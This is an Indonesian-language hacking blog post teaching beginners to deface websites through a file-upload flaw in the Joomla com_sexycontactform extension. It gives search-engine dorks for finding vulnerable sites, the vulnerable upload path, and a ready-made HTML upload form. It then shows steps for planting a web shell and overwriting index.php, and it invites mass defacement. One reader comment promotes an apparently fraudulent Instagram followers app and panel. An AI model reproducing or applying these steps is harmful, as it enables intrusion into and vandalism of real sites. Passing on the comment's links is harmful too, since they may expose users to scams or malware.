Turorial Deface Website Teknik Com Sexy + Tebas Index | _MisterNotFound_ Official Blog
 


Assalamualaikum sobat..
Udah pada tau belum deface website teknik com_sexy?
Bagi yang newbie, nih _MisterNotFound_ ajarin :3
Tuk mastah , nyimak aje ye :v


  • BAHAN :
-          Dork :
            UMUM                                 >             inurl:/com_sexycontactform/
MY FAVORITE DORK       >             inurl:/components/com_sexycontactform/
-          Exploit :
/components/com_sexycontactform/fileupload/index.php
-          CSRF
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
-          Script Deface sampeyan ;)

Shortcut : Click Here for Tutorial on Youtube


  • POC       :
-          Masukkan dork ke search engine google.
-          Pilih target. Nah, kalo ini merupakan target saya.

-          Masukkan exploitnya dibelakang url target. Jika vuln, maka akan tampil notice error.
NOTE : Jika ada path di url target, maka sampeyan harus masukkan exploitnya dibelakang path nya 



-          Kemudian seret Script Upload Button ke browser yang sedang anda gunakan.


-          Upload file Shell sampeyan.



-          Jika website vuln terhadap Shell, maka penampakannya seperti gambar dibawah ini.


-          Check Your Shell. Caranya, masukkan ‘exploit check’ ini :
components/com_sexycontactform/fileupload/files/Your Shell.php
NOTE : Cek dulu, ada path nya gak ;)
-          Dan penampakan Shell yang sudah tertanam, seperti gambar dibawah ini
-          Lalu terserah sampeyan mau diapakan tuh website. Mau mass deface ya silahkan, mau nitip nick silahkan. Nah kalo mau tebas index juga silahkan ;)
-          Cara Tebas index, seperti gambar dibawah ini
      NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
-          Copy-paste-kan script sampeyan di kolom index.php
NOTE : Sebaiknya back-up dulu script index aslinya ;)



-          Jika sudah selesai, tinggal klik SAVE

-          Penampakan setelah diperawani :)
-          Selesai. Thanks for everything ;)

Posting Komentar

  1. Tutorialnya bagus , master. Thanks

    BalasHapus
  2. minta UPLOAD BUTTONNYA mas..

    BalasHapus
  3. mastah gimana mau copy dork nya kalo di disable :(

    BalasHapus
  4. njer , Liat tutor di youtube aja pake ada iklan Ad.fly segala :3 , Males gw balik lagi kesini . Cape ngetik gw Ngetik Dork + CSRF

    BalasHapus
  5. berkah sekali bang.. wkwkwk
    cuma mampir

    BalasHapus
  6. assalamualaikum maaf kalau mengganggu. kami para hackivist indonesia baru membuat apk yg bekerja sama dgn pihak instagram. ini apk untuk memperoleh real followers aktif dengan pilihan 100 sampai 500 followers. proses selama 1x24 jam. kenapa lama bro prosesnya? iya ini foll aktif jd wajar jd menunggu semua penggunanya baru kalian saling dihubungkan. kenapa harus apk ini? emg mau kalau kalian pake apk lain terus dpt foll yg fake nggakjelas, pasti kalian gakmau! resiko pake apk ini ada gk? ya jelas ada, ini kan foll aktif jd ya bisa aja kalian di unfollow. sekian dr kami, selebihnya terserah kalian, kami cuma share. get foll ini terbagi 2, ada yg langsung di web (gak payah download apk) dan ada juga apk yg bisa disimpan di hp. link ada dibawah
    link web: https://panelfollowersaktif2017.000webhostapp.com
    link dwnload apk: https://www.dropbox.com/pri/get/Instagram_Followers_Panel_5767104.apk?_subject_uid=707375016&w=AAAXdCoJ5f1rB1FEo_deTpmaKNxX7yBt8GkUuC6Ipqj-3g

    BalasHapus

 
Top